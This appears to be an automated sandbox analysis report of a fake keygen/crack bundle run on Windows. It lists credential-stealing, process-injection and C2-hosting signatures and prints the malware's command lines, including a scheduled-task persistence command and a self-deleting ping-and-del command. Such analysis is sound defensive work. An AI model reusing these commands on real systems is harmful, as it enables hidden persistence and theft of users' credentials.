N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2912 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 3032 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2764 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1708 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 664 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2500 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1708 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1356 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 136

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

Files

N/A